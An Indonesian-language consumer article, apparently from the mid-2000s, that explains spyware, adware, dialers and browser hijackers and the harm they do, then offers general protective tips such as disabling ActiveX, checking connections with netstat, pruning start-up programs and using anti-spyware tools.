Bagaimana masuknya program spyware ini. Umumnya program jenis spyware masuk secara langsung dengan mengelabuhi pemakai internet. Bisa saja seseorang yang membuka sebuah website dan secara tidak sengaja menerima sebuah peringatan dan melakukan apa yang di kehendaki oleh si pembuat web. Spyware sebenarnya tidak berbahaya, karena hanya difungsikan untuk memata matai computer seseorang setelah berkunjung. Sayangnya semakin hari semakin berkembang, bahkan spyware sudah dijadikan alat untuk mencari data pribadi pada sebuah computer. Dan diam diam mengunakan koneksi internet anda tanpa diketahui dan computer sudah menjadi mata mata tanpa diketahui pemiliknya
Adware
Adware sebenarnya difungsikan sebagai promosi atau iklan berbentuk banner. Terkadang pemakai ingin mengunakan program shareware tetapi didalamnya terdapat program yang difungsikan sebagai Adware. Misalnya Program A yang diberikan secara gratis, ternyata memiliki jendela kecil pada program dan terus berganti ganti gambar iklan. Atau anda mengunakan Yahoo messenger dan pemilik Yahoo menempatkan banner iklan pada sebuah bagian di program Yahoo chat.
Kategori diatas masih dikatakan aman, pembuat program memberikan program gratis, sementara mendapatkan dana uang dari iklan yang ditempatkan pada programnya. Sayangnya program Adware mulai dimanfaatkan terlalu banyak. Terkadang mengambil bandwidth atau beban koneksi internet terlalu besar dan akhirnya membuat koneksi internet menjadi benar benar lambat dan menganggu computer ketika melakukan surfing. Terlebih adware yang sudah masuk kedalam computer dan menjakit didalam program Windows. Ketika seseorang membuka sebuah site maka yang muncul adalah link ke site yang ditentukan oleh program Adware. Hal paling menjengkelkan bila jenis Adware yang tidak dapat ditutup. Begitu satu pop iklan muncul ditutup, tidak lama lagi muncul pop baru yang lebih banyak.
Bahkan Adware dapat melakukan pekerjaan ganda yang dibutuhkan pada tampilan sebuah iklan atau si pembuat program memanfaatkan dengan merekam data netter. Misalnya mencari tahu kemana saja seorang pemakai computer melakukan surfing di internet atau ingin mengetahui apakah netter juga mengunjungi pihak perusahaan pesaing yang sama. Artinya dengan adanya Adware, Privasi seseorang mulai dapat dilihat oleh orang lain. Adware bukan tidak saja menganggu privasi seseorang, tetapi mencuri bandwidth internet anda secara diam diam.

Pengaman yang tidak selalu aman
Dengan antivirus yang terpasang tidak menjanjikan sebuah computer aman dari kutu digital. AntiVirus umumnya hanya ditujukan bagi virus penganggu dan sifatnya non-komersil. Virus umumnya dapat dibedakan dengan Malware memiliki sifat komersil. Tetapi apa artinya bila perbedaan hanyalah sebagai sebuah nama. Tetapi fungsinya tetap sama, yaitu menganggu computer bekerja dan merugikan pemakai computer
Spyware dan Adware akan efektif dihadapi dengan program tersendiri dan bukan oleh program Antivirus. Demikian juga dengan kemampuan dari pembuat Anti Spyware, kombinasi beberapa program Anti Spyware akan lebih efektif. Walaupun cara ini tidak menjamin 100% computer bebas dari program Malware. Karena sampai Oktober 2005, jenis Malware, Spyware dan Adware telah mencapai jumlah 45,000 lebih

Kerugian dengan adanya Malware pada sebuah computer
Paling awal untuk kerugian adalah koneksi bandwidth internet. Karena media internet menjadi salah satu keuntungan pembuat Malware. Koneksi internet akan menjadi lambat atau sangat lambat karena terus dibebani oleh program parasit
Computer juga menjadi lambat. Beberapa Malware masuk kedalam start-up System Windows tanpa diketahui pemilik computer. Bahkan beberapa program juga terus aktif dan memakan utilitas processor. Artinya, walaupun computer sedang idle ternyata computer sebenarnya masih terus bekerja dengan beban dari program Malware. Tentu dengan beban tersebut juga akan menarik daya listrik pada computer serta membuat computer menjadi lambat
Pada Dialer, terkadang bisa melakukan link ke internet dengan sendirinya. Bila koneksi internet dilakukan dengan Dial-up. Diam diam Malware Dialer dapat aktif dengan sendirinya.
Computer yang terinfeksi parasit tidak saja menjadi lambat ketika dinyalakan. Bila sudah terlalu banyak dapat membuat computer menjadi sangat lambat bahkan crash.
Paling menganggu pada Hijacker, karena program browser anda yang diserang. Maka browser anda menjadi kacau. Mengetik alamat kesebuah situs yang benar bisa menjadi salah bila Browser sudah dimasuki program jenis Hijacker. Dan kontrol dari program Malware akan menganggu kenyamanan netter. Belum lagi muncul pop-up windows yang terus saja muncul. Kerugian pada Hijacker adalah waktu yang terbuang karena Browser dikacaukan untuk mengarahkan ke alamat site atau situs yang salah.
Dan masih banyak lagi dampak dari program Malware yang bisa dilakukan oleh si pembuat program.

Menghadapi kutu Digital dan worm virus
Beberapa upaya sederhana dapat dilakukan untuk terhindar dari kutu internet.
Pertama biasakan mendidik diri sendiri untuk tidak memasuki area terlarang atau wilayah berbahaya. Ungkapan ada gula pasti ada semut memang sulit dirubah. Beberapa netter ingin mencari informasi atau yah kita tahu lah didaerah apa yang terlihat menghibur dengan kesenangan sesaat. Ada baiknya menghindari area berbahaya tersebut, atau mempersiapkan computer untuk menghadapi site site berbahaya.
Biasakan tidak mengclick kata next pada situs tertentu. Umumnya situs yang memiliki program kutu internet mencoba mengakali pemakai internet. Cara menjebak pemakai banyak dilakukan oleh site site porno gratis atau software gratis misalnya dengan memberikan warning anda harus berumur 17 tahun dan anda harus menyetujui dengan mengclick icon mereka. Terserah apa yang anda click, sebenarnya tidak akan berbeda. Selanjutnya program di kirim ke computer anda dan selesai tugas mereka menjebak anda.
Jangan meng-click sebuah link bila anda tidak yakin mendapatkan sebuah email yang tidak jelas. Bila anda mengatakan bahwa ini hanyalah sebuah link ke sebuah situs dan tidak berbahaya, kemungkinan pernyataan tersebut salah besar. Link yang ada bisa saja berhubungan dengan sebuah situs yang selalu telah siap menyerang computer anda. Beberapa kelemahan umumnya terjadi pada program Internet Explorer. Dan saat saat demikian memang sengaja ditunggu oleh pemiliki program menjebak netter yang tidak mengupdate program Internet Explorer.
Berhati hati dengan para pembuat program untuk digunakan secara gratis / freeware. Percayalah dari semua pembuat program kemungkinan ada yang tidak jujur. Dan anda dapat saja dimanfaatkan dengan kata kata gratis tetapi diam diam program mereka melakukan hal hal yang tidak anda inginkan. Hasilnya, biaya koneksi internet menjadi lebih mahal dibandingkan dengan membeli software sebenarnya.
Tolak semua yang meminta menginstall program. Dengan janji apapun yang terlihat legal sebenarnya use dipaksa untuk menerima program dari sebuah website agar dapat dimasukan Adware ataupun Spyware.
Matikan program tanpa dengan mematikan tanda X pada windows sebelah kanan atas. Dan jangan pernah mempercayai pilihan Yes, No dan lainnya yang disediakan. Karena kemungkinan pilihan tersebut semuanya berfungsi sama.
Matikan fungsi download ActiveX dari browse dan hanya menjalankan bila diperlukan.
Khususnya Internet Explorer dari Microsoft selalu menjadi target dari pembuat kutu dan memanfaatkan kelemahan program. Dan biasakan mengaktifkan auto update agar keamanan sistem operasi terus update.
Untuk keamanan lebih baik, gunakan program browser lain yang bukan menjadi target para kutu internet. Misalnya AdvantBrowser, NetCaptor dan lainnya yang memiliki tambahan sistem pengaman untuk melakukan blocking pop windows. Pemakaian program tambahan dengan fasilitas Anti Pop membantu netter terhindari dari jebakan pop yang sering muncul dan menawarkan sesuatu. Tetapi tidak menjamin bahwa apa yang anda lakukan telah aman.
Matikan program Java dan Flash bila anda tidak mengunakan atau uninstall program dari harddisk. Beberapa kelemahan pada browser biasanya juga memanfaatkan lubang browser dengan Java.
Coba periksa dengan fungsi command dari Windows dengan NetStat. Dengan program ini, maka anda dapat mengetahui kemana computer anda sedang terhubung. Bila pertama computer dijalankan dan lampu network pada sebelah kiri bawah Windows anda terus berkedip. Curigai bahwa computer anda kemungkinan telah dimasuki program Malware. Caranya dengan membiarkan computer terhubung ke internet, dan diamkan beberapa saat. Jalankan kembali program NetStat dan lihat kemana saja computer mencoba melakukan koneksi ke jalur internet. Dalam kondisi diam atau anda tidak membuka aplikasi apapun, daftar IP pada Netstat akan kosong. Bila muncul daftar IP tertentu, waspadai computer anda sudah terjangkit Malware. Untuk memudahkan melihat koneksi computer, dapat digunakan software TCPview dari www.sysinternals.com
Matikan program pada start-up Windows. Untuk mudahnya, anda dapat mengunakan software Tune-up, dan melihat file apa saja yang di loading ketika awal computer bekerja.
Perhatikan apakah pada daftar program terdapat program yang tidak dikenal. Tapi hal yang perlu diingat, program malware belum tentu dapat terlihat pada Star-Up dan tersembunyi didalam sistem Registry Windows. Membuang pada Start-Up Windows hanya efektif untuk mematikan Malware sederhana. Sedangkan yang lebih komplek lagi tidak dapat dimatikan dengan cara demikian.
Gunakan program Anti Spyware untuk menghadapi serangan Malware atau Spyware. Program Anti Spyware dapat mencegah masuknya program yang akan menganggu dan menyerang computer.
Jangan selalu mempercayakan 100% pada sebuah program. Cara terbaik terhindar dari program Malware adalah tidak menghubungkan computer pada jaringan internet.
Kombinasi pemakaian beberapa anti Spyware mungkin menjadi solusi terbaik. Karena tidak semua anti Spyware mampu membersihkan computer yang telah terjangkit Malware atau Spyware program.
Dibawah ini adalah daftar dari program anti spyware :

Result
Spyware dan Adware hanyalah sebagian dari penganggu sebagai kelompok terbesar saat ini. Dengan adanya informasi ini, anda dapat memperkirakan tindakan apa yang harus dilakukan untuk menghadapi serangan Adware dan Spyware. Dan anda sudah memperkirakan seperti apa saja serangan yang dapat dilakukan bila mengunjungi situs situs tertentu. Mengunakan computer untuk berjalan jalan di dunia maya memang sudah tidak aman lagi. Tetapi dengan penambahan pengetahuan pada pada artikel ini, anda sudah memperkirakan apa saja yang akan terjadi bila secara tidak sengaja memasuki sebuah situs.
JARINGAN TEKNOLOGI KOMPUTER